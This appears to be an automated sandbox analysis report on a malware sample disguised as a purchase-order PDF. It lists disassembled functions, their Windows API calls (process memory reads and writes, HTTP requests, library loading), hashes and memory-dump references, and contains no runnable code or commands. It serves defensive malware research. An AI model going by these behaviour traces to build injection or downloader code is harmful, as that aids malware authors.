                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: LPT$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3035604524-2728063697
                                                                                                                                                                                                                                                                                                            • Opcode ID: c69e8bcaaf34f6b2839d1c10923ed9f72eeefb1e6e810cf1325bff5f105684a2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c69e8bcaaf34f6b2839d1c10923ed9f72eeefb1e6e810cf1325bff5f105684a2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                                                                                                                                                                                                            Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                            • API String ID: 4055202900-2766056989
                                                                                                                                                                                                                                                                                                            • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                                                                                                                                                            • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                                                                                                                                                                                                            Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_memset_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                                            • API String ID: 915713708-2343686810
                                                                                                                                                                                                                                                                                                            • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                                                                                                                                                            • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                                                                                                                                                                                                            Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3705125965-3916222277
                                                                                                                                                                                                                                                                                                            • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                                                                                                                                                            • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                                                                                                                                                                                                            Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                                                                                                                                                                                                            Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: AU3_GetPluginDetails
                                                                                                                                                                                                                                                                                                            • API String ID: 145871493-4132174516
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1dedf52a0f02eaacb12c2aa0276960dc02bae986cca214e7a202bdcf23f35f06
                                                                                                                                                                                                                                                                                                            • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dedf52a0f02eaacb12c2aa0276960dc02bae986cca214e7a202bdcf23f35f06
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                                                                                                                                                                                                            Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                            • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                                                                                                                                                                                                            Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                            • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                                                                            • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                                                                                                                                                                                            Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                                                                                                                                                                                            Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                                                                                                                                                                                            Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
